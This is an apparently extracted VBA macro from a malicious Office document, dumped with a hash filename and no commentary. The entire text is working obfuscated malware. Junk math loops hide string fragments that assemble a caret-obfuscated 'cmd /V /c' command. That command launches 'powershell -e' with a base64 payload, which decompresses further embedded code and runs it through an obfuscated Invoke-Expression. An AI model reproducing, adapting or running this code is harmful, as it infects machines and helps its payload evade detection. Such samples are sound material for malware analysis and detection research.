Filename     : ./macros/4c28b6327d5fac72f8a9b81db0080c32711a3ce856ccc0070d22fc1156b38e89
OLE stream   : Macros/VBA/lRksqKSwAX
VBA filename : lRksqKSwAX.bas
----------------------------------------
Attribute VB_Name = "lRksqKSwAX"
Function NqskEBPiEUI()
On Error Resume Next
For nfjBjw = jbXiv To 47742
         TjpNsw = (HlzDmw - ChrW(51725 * 27888) * IOmUdo * CInt(XsDObb + Sqr(43317)) + 24597 - 21530 / 91479 - CDate(EiVJFo - 4967 + 61109 - Hex(kwwzvV / 2508)) + (QIDBf * Tan(SUpiBj)))
Next
jWzadBKcr = "md woKiUTi" + "BMYzZpd j" + "kPrDDn" + "Uz" + "iL" + "WomvcooP" + "fiZWoKi" + " ozzrShOXzu & " + "    %^c" + "^o^m^S"
For msrTW = EzIzSz To 89817
         YvFSG = (HwCrd - ChrW(48378 * 90484) * oQGBz * CInt(zFFiZp + Sqr(92976)) + 29539 - 14804 / 20753 - CDate(DkftYj - 29224 + 89901 - Hex(Hppzq / 95073)) + (CKrrRw * Tan(KTqbt)))
Next
SRnzQGhizf = "^p^E^c^" + "%     %" + "^c^o" + "^m^S^p^E^c^" + "% " + "    /V   " + "      /c     "
For dsprF = oPIPj To 83935
         sXHPG = (bEtFPT - ChrW(39716 * 10576) * UaiIV * CInt(dOAwtQ + Sqr(16786)) + 40132 - 88933 / 89051 - CDate(zKGrC - 7248 + 69621 - Hex(RMjnZX / 71730)) + (UvhhY * Tan(cPJHR)))
Next
juPcTm = "      set %" + "NuKTK" + "zJzqNZdXlB%=LBK" + "tDtVPf&&se" + "t %ChBWbpQuQlVX"
For XTjzK = UKzcR To 43941
         UDRtbb = (IvoZMN - ChrW(75273 * 56267) * qivmXP * CInt(ckcUDb + Sqr(40152)) + 83287 - 57158 / 21005 - CDate(DSLWif - 82897 + 7712 - Hex(iKmzRr / 54797)) + (uWkaF * Tan(pIwGW)))
Next
DYihwrD = "%=p&" + "&se" + "t %CbzKRkCpbh" + "kzoz%=o^w&&s" + "et %B"
For bzvBij = WUAPv To 38137
         URzfDM = (MzHaIw - ChrW(25485 * 42791) * jZUWA * CInt(OlThjG + Sqr(76696)) + 87710 - 12623 / 79055 - CDate(RkXLT - 5112 + 19786 - Hex(OAobWl / 95501)) + (HQqaz * Tan(nDMLWj)))
Next
VPwQRW = "lTEHZPz" + "hatF" + "MXZ%=rUUw" + "LZMqE&&set" + " %DJnjaA"
For YDAlBj = zCQWKo To 73352
         aKzviG = (dQOJiz - ChrW(38679 * 98656) * jiqqw * CInt(pVFVBF + Sqr(99653)) + 37470 - 32206 / 17004 - CDate(GcBOa - 95259 + 73709 - Hex(akXrBi / 59418)) + (Jqfwv * Tan(nUbqNF)))
Next
RhBLUN = "Sm%=!%Ch" + "BW" + "bpQuQlVX%" + "!&&set %VN" + "MDq" + "UZvoIO" + "psi" + "o%=fqKHIzd" + "l&&set %zOr"
For dwzAir = zsFjDw To 42176
         SdDqW = (qdkKE - ChrW(41813 * 79483) * mjkhQz * CInt(ZqXnnF + Sqr(31272)) + 70638 - 98791 / 89016 - CDate(OkCznW - 67168 + 46609 - Hex(TMqZVC / 32225)) + (VwWhY * Tan(snfDi)))
Next
AXkbawNOTjK = "ozBHPw%=e^r&&s" + "et %lXWHoM" + "lr%=!%Cb" + "zKRkCpbhkzoz%" + "!&&set %" + "iBcpIu" + "a%=s&&" + "set %" + "jMYAQUcYczlLCu" + "q%="
NqskEBPiEUI = jWzadBKcr + SRnzQGhizf + juPcTm + DYihwrD + VPwQRW + RhBLUN + AXkbawNOTjK
End Function
Function bldzHzmdwF()
On Error Resume Next
For aslQHH = iowNw To 85983
         TMAwR = (oKOCXP - ChrW(80511 * 41921) * KITAa * CInt(bbZRO + Sqr(95172)) + 73125 - 32645 / 49676 - CDate(YoOufn - 62463 + 73552 - Hex(JQdiss / 33346)) + (VinuwS * Tan(slahCn)))
Next
mBMKTCkINdc = "UJYPLXw" + "l&&" + "set " + "%RcJJBFwM%=h" + "e&&set %aA" + "QYmqzwC"
For toUza = adWbjC To 32829
         wshZzO = (mmoaW - ChrW(29800 * 4684) * NzjJHW * CInt(OtRpHr + Sqr(14891)) + 22476 - 26346 / 91465 - CDate(CustH - 10564 + 48311 - Hex(GCfZEM / 47097)) + (JczsJZ * Tan(inIHG)))
Next
CCDILUpwXOM = "ujXsu" + "%=ll" + "&&!%DJ" + "njaAS" + "m%" + "!!%lXWHoMlr" + "%!!%zOrozBHPw" + "%!!%iBcpIua" + "%!!%RcJJBFwM%!!" + "%aAQYmqzwCujXsu"
For iaaiV = IBTri To 70622
         PliTM = (jIziQC - ChrW(83185 * 56366) * NFzzSM * CInt(cFuizQ + Sqr(64995)) + 80760 - 72498 / 37105 - CDate(oJXwU - 90750 + 58954 - Hex(QjrKb / 58199)) + (XnOrjS * Tan(nJcYi)))
Next
wuvTfjMMC = "%! " + " -e" + " IAAoACA" + "ATgBFAHc" + "ALQBvAEIA" + "SgBlAGMAdA"
For TaHzzu = TNRlE To 36675
         wvkvTE = (tubum - ChrW(80399 * 60326) * OTvQA * CInt(pYuNj + Sqr(52418)) + 30261 - 19061 / 42437 - CDate(mNWMrY - 64888 + 10670 - Hex(OZjjC / 19420)) + (Xwwzq * Tan(SrGXqi)))
Next
FTXAVO = "AgAGkAbwAuA" + "GMATw" + "BtAHAAcgBFA" + "HMAcwBJ" + "AE8AbgAuAGQ"
For dzjYwH = SSipl To 80231
         miJsrC = (DRLYmz - ChrW(90530 * 60886) * UizTw * CInt(qIhvk + Sqr(73141)) + 9123 - 38086 / 18013 - CDate(AwfMz - 58920 + 96986 - Hex(KZiYAM / 16577)) + (nNJGmW * Tan(YoAKwS)))
Next
vCTFbEpi = "AZQBm" + "AGwAQQB" + "UAGUAUw" + "B0AFIAZQBhAE0AK" + "AAgA"
For wzBLmC = SIpkU To 17022
         fRIVm = (wrKCZ - ChrW(57561 * 4800) * YwTBM * CInt(akWoZ + Sqr(12240)) + 28665 - 39076 / 10030 - CDate(WRNXs - 43575 + 85700 - Hex(JNrHnz / 73031)) + (zJuLW * Tan(IowvuU)))
Next
uGLSi = "FsASQ" + "BPAC4AbQ" + "BFAG" + "0ATwBS" + "AHkAc" + "wB0AFI" + "ARQBhAG0AXQAgA" + "FsAU" + "wB5AFMAVABFAG0" + "ALg"
For jqimqf = QfNBE To 57970
         zdTwXC = (GFZuz - ChrW(77577 * 18067) * azbYt * CInt(WMVzTd + Sqr(84795)) + 39113 - 91673 / 86389 - CDate(sqILd - 97740 + 44870 - Hex(iZlEs / 87103)) + (zrEQZf * Tan(OdQwzE)))
Next
lqAurD = "BDAE8ATgBWAE" + "UAUgBUA" + "F0AOgA6AEYA" + "UgBv" + "AE0AQgBBAFMA"
bldzHzmdwF = mBMKTCkINdc + CCDILUpwXOM + wuvTfjMMC + FTXAVO + vCTFbEpi + uGLSi + lqAurD
End Function
Function WZXtwHS()
On Error Resume Next
For ZmJjn = zAOzw To 8460
         PElHc = (biBPf - ChrW(36469 * 51911) * cfuiz * CInt(tEnbX + Sqr(9814)) + 77223 - 87652 / 96999 - CDate(HRVZUJ - 84423 + 16444 - Hex(vcuYW / 58568)) + (MzVUT * Tan(zlMKQ)))
Next
NDcXiDKM = "RQA2ADQAcwB0A" + "HIASQBuAGcAKAA" + "nAEwAWgBC" + "AGQA"
For kXPij = HNzBn To 35456
         mJDqzj = (wKsqX - ChrW(56789 * 18191) * SkMJth * CInt(zjuOA + Sqr(28643)) + 31694 - 31595 / 20700 - CDate(DhhIv - 89733 + 25683 - Hex(ANZiYK / 4864)) + (SvNod * Tan(FNLXw)))
Next
ERLzzC = "YQA4" + "AEkAdwBGAEkAY" + "gB2AEIAL" + "wBzAFAAbwB" + "SAFIAUABRAGoA"
For jBjtih = wcjWp To 98918
         sUwTHj = (lwUDW - ChrW(62388 * 57182) * TzYwbz * CInt(hjwrpG + Sqr(74288)) + 73973 - 48922 / 45344 - CDate(zjlOsQ - 24350 + 49890 - Hex(FLqMAr / 40882)) + (jzrXi * Tan(nSWPuF)))
Next
bBMiQG = "VwB1AHUA" + "bwB0AGgAawBYADA" + "Ab" + "wBBAH" + "gAawBvAHIAQ" + "gB0AE8AMgBFAFgA" + "VABOAEwAVwBk" + "AE4AUwBsAHQANQ"
For Jvfjiw = EEIlBC To 86982
         pkrwk = (DbjRPm - ChrW(96635 * 93478) * ASUwv * CInt(KfRuf + Sqr(6299)) + 58993 - 79847 / 11470 - CDate(jARcl - 47431 + 92461 - Hex(UGTzP / 37938)) + (rIiIT * Tan(GzFfFZ)))
Next
cDLaHvLjOIw = "BnAGY" + "AaQBmADkAKwBKA" + "EwAdABEA" + "EQAYQBY"
WZXtwHS = NDcXiDKM + ERLzzC + bBMiQG + cDLaHvLjOIw
End Function
Function fqQOUGhwH()
On Error Resume Next
For FbYla = jmjUkb To 42620
         bpwLP = (jouwhm - ChrW(77147 * 50165) * Mzjzr * CInt(thhZT + Sqr(70590)) + 46286 - 20624 / 77390 - CDate(jzhiHI - 38251 + 80306 - Hex(URjcEn / 15419)) + (iUWEc * Tan(kiHOlw)))
Next
zLquGbwJP = "AGcATwB6" + "ADUAdgBqAD" + "YAMQBaAGsAb" + "wBzADMASQBtA" + "EgAU" + "QBvAG"
For LdGwA = GvvDdq To 46260
         wMFdl = (bpqRt - ChrW(7999 * 36129) * vAuitN * CInt(nZdDz + Sqr(2445)) + 24949 - 75897 / 33289 - CDate(NEGmVC - 72308 + 99746 - Hex(lWnpFw / 43962)) + (AvJvz * Tan(PKncZ)))
Next
dJPoTobwWwL = "EAQQBoAEE" + "AUQBVAE" + "IAaAAzADgAUAB" + "PAHAA" + "RAA5AEsAQQ" + "BnAHYAQQ" + "BBAGkATwBOA" + "DAASgBuAFoAUgB"
For JOBYYj = MKZzIi To 14957
         lAkYGa = (MsIzQu - ChrW(83498 * 53534) * aMLbWU * CInt(QZwKA + Sqr(51823)) + 94874 - 1023 / 25568 - CDate(hdKDDS - 25324 + 36110 - Hex(JQbQF / 39790)) + (rXwWjF * Tan(lUzJQ)))
Next
zXBpMkGqHjU = "2ADUAcQ" + "A5AFkAawBzAFIA" + "eABaA" + "EIAMgBEAHYANA" + "BuADMA" + "VwB6AEUAbABGA" + "EcANABtAE4Acg" + "AxAFoAY" + "gBQAGwAZQBWAE" + "wAbABV"
For luHkaM = RfWtw To 16819
         LzoIr = (RjZEqJ - ChrW(53713 * 24338) * iEIwb * CInt(OIrpt + Sqr(13097)) + 32400 - 23563 / 3104 - CDate(XXlFo - 59951 + 81253 - Hex(aZBVD / 87133)) + (kBswR * Tan(BjDwoz)))
Next
waQFURqwS = "ADYAc" + "QBVAG0AawBi" + "ACsAZgBQ" + "ADQAQgBTAGYAOQ" + "BmAHkA" + "SABYADYAbQBCAH" + "AAZ" + "QBJAGUAbgBTA" + "HcAWQBQAGcAM"
For zjBXX = SlqHk To 7317
         qWCPt = (zYIFY - ChrW(30938 * 69764) * WqhIz * CInt(WUqYiz + Sqr(5745)) + 50731 - 60023 / 88553 - CDate(IsCuii - 77515 + 6715 - Hex(zupdcH / 76353)) + (wvIwlW * Tan(VfikvC)))
Next
rGNDAuaK = "wBBADQ" + "AWgBKA" + "EgALw" + "BQAEoAMQA4AEk" + "AVQBUAG"
For tOLPX = YrMtFP To 64595
         fNvXJV = (jlvWVL - ChrW(47472 * 97779) * DHhcB * CInt(SMjGIF + Sqr(67795)) + 28658 - 86332 / 41707 - CDate(PqSjNm - 63493 + 88085 - Hex(dPtBW / 348)) + (MpziFa * Tan(uinDM)))
Next
aYKqnB = "gAOQBxAGEAdwB0A" + "GgANwAxAC" + "sAMgB2AGgATgBD" + "AG8A" + "WAArADIAcwAyAHk" + "ATQB" + "QAHcAb"
fqQOUGhwH = zLquGbwJP + dJPoTobwWwL + zXBpMkGqHjU + waQFURqwS + rGNDAuaK + aYKqnB
End Function
Function UhjvzwfFc()
On Error Resume Next
For AWDBh = ijQqVA To 66379
         zCThjI = (XZvnj - ChrW(78136 * 72073) * AZiUV * CInt(GMrUa + Sqr(33724)) + 24096 - 90906 / 98377 - CDate(iWiGsO - 11729 + 37597 - Hex(LdzHN / 95565)) + (zIPRm * Tan(NjrqbN)))
Next
rAktz = "gBrAHUARA" + "AzAGIAYgAv" + "AGgAbgBYAHgAM" + "wByAGUAcQB"
For rAbZS = MFifm To 36853
         QJfIE = (WTUEfh - ChrW(80138 * 4642) * zPCms * CInt(MLBXp + Sqr(16431)) + 71022 - 2620 / 35569 - CDate(dwXODD - 65923 + 72119 - Hex(qpWvws / 56080)) + (DGPdA * Tan(FEzdlP)))
Next
ZLwEYSphJ = "0AFQAdABzAGUAV" + "gAxAGcAcgBm" + "AEYANwBy" + "AE0AWgBDA" + "G0AeQBiAGsA" + "UgAvAHcAU" + "gBq"
For lSBbC = SnFwhQ To 78118
         UpQFf = (FhvDz - ChrW(55952 * 46099) * KGZwV * CInt(EXUUuI + Sqr(21038)) + 29127 - 95639 / 18996 - CDate(MLXkOh - 47689 + 11299 - Hex(PEWwb / 48115)) + (zdwWk * Tan(MzwUvK)))
Next
mpGuwGRXvSY = "AFEAYgBHADQAN" + "wBvAHEA" + "TABZAFUAb" + "gBRAEUAMA" + "A4AG4AYgBnAG" + "8AUwB1ADkAR" + "wA"
For AqjlV = RAhvZB To 82825
         MABWs = (zLlwn - ChrW(95235 * 34833) * ZotlOj * CInt(ZUlcp + Sqr(14411)) + 21876 - 34990 / 65172 - CDate(VtcAz - 90417 + 96917 - Hex(pZpEl / 96033)) + (USatB * Tan(mHPmjQ)))
Next
QZnRqLz = "5AFcAOQBhAGwAWg" + "BJAE" + "UAQgBMADQAQgA" + "2AHkAVgBsAF"
UhjvzwfFc = rAktz + ZLwEYSphJ + mpGuwGRXvSY + QZnRqLz
End Function
Function uWkqbdpXSaC()
On Error Resume Next
For DNlsDZ = Epwct To 91340
         YJNUjn = (VplZj - ChrW(71756 * 66257) * NNRiEA * CInt(nwBLfT + Sqr(59647)) + 37438 - 95676 / 99116 - CDate(FOwCS - 93806 + 55391 - Hex(iYATXo / 68777)) + (blKOq * Tan(zWQTXH)))
Next
pztKhnHnrfD = "EAQwBn" + "AEYANwBuAH" + "cASA" + "A5A" + "DMAeQBGAEkANw" + "BsAHAAbABKAEE"
For pVnZaf = nLuUC To 31780
         CmddX = (ADhmkP - ChrW(45616 * 32057) * lwZVDs * CInt(NuzIP + Sqr(61122)) + 31579 - 82005 / 80626 - CDate(aPujn - 80854 + 671 - Hex(kmnAo / 20029)) + (DLZwv * Tan(NazZif)))
Next
rkrzqvjKFin = "ARgA5AFUAVwBi" + "AFMAMQBKAHEAYw" + "BvAG4ASwBUA" + "HIAWQA1A"
For jVmrz = pHVsw To 16918
         JSFPM = (nALUq - ChrW(89425 * 88836) * MpvJEK * CInt(iPAwDQ + Sqr(39965)) + 7 - 65027 / 35375 - CDate(nWXuUk - 25208 + 56101 - Hex(NUAvwC / 86603)) + (Sajuwn * Tan(DFSJpS)))
Next
zCQBOizUzAP = "G4AdAB4AE8A" + "dQBEAGMAMQB5AFY" + "ASgBYAHkAVQ" + "BKA" + "GsAcgA3AE8A" + "awBVAH" + "QANABWAD" + "UAZA"
For dCPHX = SULwb To 33318
         KPEzA = (rhHjj - ChrW(78221 * 69075) * rPRDna * CInt(rwjpf + Sqr(70601)) + 20891 - 94577 / 29674 - CDate(ShPUoA - 36426 + 16607 - Hex(aSWTi / 35543)) + (PaEtsn * Tan(LSQXKU)))
Next
sKYbZiaqL = "A2AEgAaQBX" + "ADIAV" + "ABs" + "AE0AbAA4ADcAV" + "gBIA"
For jkrwOH = XCPwv To 40520
         uUfzXs = (jsVuf - ChrW(81700 * 7933) * XcInj * CInt(iiWULS + Sqr(84561)) + 46074 - 80388 / 91548 - CDate(SqRwla - 75503 + 54880 - Hex(wsWCi / 32393)) + (WfmpH * Tan(GLpIcL)))
Next
LirOW = "FcASgBjA" + "DcATgBv" + "AGcANABLAFoAaQ" + "BqAFEATw" + "ArAE0ATQBHAD"
uWkqbdpXSaC = pztKhnHnrfD + rkrzqvjKFin + zCQBOizUzAP + sKYbZiaqL + LirOW
End Function
Function PHqoPBnlvXm()
On Error Resume Next
For cMCZw = znDlC To 41065
         OwpIU = (uBVsDF - ChrW(80240 * 57233) * FIdzbC * CInt(kqwFWR + Sqr(56827)) + 36217 - 88646 / 68780 - CDate(waJWj - 77835 + 83010 - Hex(XHTwU / 13754)) + (PiuIEu * Tan(aLzMO)))
Next
ASvFLH = "cAZAB" + "HADE" + "AWABNADMAdQBEAG" + "gA" + "YwBJAGIA" + "MQBpAEsAVQBvA" + "DMAMAB" + "WAGsA"
For dYDwT = tDaibo To 12246
         ihRrc = (nCvYli - ChrW(50699 * 76627) * wWUZbo * CInt(EVfiNf + Sqr(77434)) + 98558 - 35560 / 37024 - CDate(kdsuIj - 31115 + 53637 - Hex(ciMoLF / 7750)) + (LHOiVf * Tan(vMtkIO)))
Next
qEYHT = "SwBLADQ" + "AdgBUACsAZgB3" + "AEgAJwApACwAWw" + "BzAHkAUwBUA" + "EUATQAuAGkA" + "bwAuAEMATwBN" + "AFAAcgBFAFMAcw" + "BpAG8AbgAuA" + "EMAb" + "wBtAFAA"
For FSjqKG = OkJzN To 44008
         IqXIb = (nLETP - ChrW(97525 * 29800) * wpfTMj * CInt(tIVvz + Sqr(47683)) + 94955 - 43148 / 10031 - CDate(HIDmVW - 54554 + 64131 - Hex(IuOMb / 21835)) + (FSuijB * Tan(APhCMd)))
Next
iQtisEuXo = "UgBlAHMAUwBpA" + "G8AbgBtA" + "E8A" + "ZABFAF" + "0AOgA6AEQA" + "RQBjAG8ATQBQA"
For pozpHq = LaTDm To 20031
         ifwuk = (Tfbbw - ChrW(12140 * 34194) * XoUPD * CInt(SFPXT + Sqr(40049)) + 61153 - 88615 / 84571 - CDate(auqSWk - 71117 + 15857 - Hex(XTKNYq / 2689)) + (Inlzn * Tan(uEYPZa)))
Next
DVdvz = "FIARQBzAH" + "MAKQAgAHwA" + "IABGAG8AUg" + "BFAGEAQw" + "BIAHsAT" + "gBFAHcALQBvA" + "EIASgBlAGMA" + "dAAgAGkATwAuAF" + "MAdABSA"
For aZnAA = PwjnD To 23228
         fvIsrj = (wXGGc - ChrW(75680 * 22373) * OwULhN * CInt(uXMXml + Sqr(49704)) + 53537 - 801 / 65648 - CDate(ADzwfY - 87154 + 16831 - Hex(CSjXM / 85392)) + (khSri * Tan(hBkfT)))
Next
IKrVijzKcfS = "EU" + "AQQBtAHIARQ" + "BhAGQAZQ" + "BSACgAJA" + "BfACwAWwBU"
For jWvFYp = IwRTvS To 47710
         vbqoLu = (pthqI - ChrW(52139 * 41342) * MzFAcw * CInt(NIiaj + Sqr(44747)) + 36051 - 28413 / 44434 - CDate(Ffmat - 82283 + 15601 - Hex(OjBYhj / 22244)) + (zFTqSw * Tan(oOiGlK)))
Next
LRndI = "AEUAWABUA" + "C4ARQBuAGMAbwB" + "kAEkATgBnAF0A" + "OgA6AEEA" + "UwBjAGkAaQApAH" + "0AIAApAC4AU" + "gBlAGE"
For WfKQCv = WSIzBO To 30790
         oaBOw = (MvjHJ - ChrW(65881 * 96128) * LkWoT * CInt(WORdP + Sqr(7411)) + 54676 - 75399 / 19999 - CDate(QihjZH - 8181 + 43640 - Hex(WJjdI / 87209)) + (lKHYa * Tan(uFiaJ)))
Next
XTLWDUbcJ = "ARAB0AE8ARQBuAE" + "QAKAApAHw" + "AJgAoAC" + "AAJABQAHMASABPA" + "E0AZQBbAD"
For wtvZl = rbBOmE To 62135
         azAmk = (kCSRj - ChrW(73071 * 37429) * obAzw * CInt(YUbjwr + Sqr(34071)) + 34748 - 23719 / 42857 - CDate(CsZnw - 8825 + 92328 - Hex(Anwadt / 98117)) + (onZOn * Tan(AcFWR)))
Next
aTYXwIGju = "IAMQB" + "dA" + "CsA" + "JA" + "BQAFMASABvA"
For trSqwt = ttPrXE To 16815
         sbuzqz = (dimHk - ChrW(94109 * 84637) * hanIzJ * CInt(GdkQF + Sqr(49617)) + 46570 - 92459 / 4727 - CDate(iIHAL - 47833 + 52159 - Hex(VNnDoI / 61875)) + (viQjw * Tan(oXVQM)))
Next
IzKMI = "G0ARQBbADMAMAB" + "dACsAJwB4" + "ACcA" + "KQA="
PHqoPBnlvXm = ASvFLH + qEYHT + iQtisEuXo + DVdvz + IKrVijzKcfS + LRndI + XTLWDUbcJ + aTYXwIGju + IzKMI
End Function

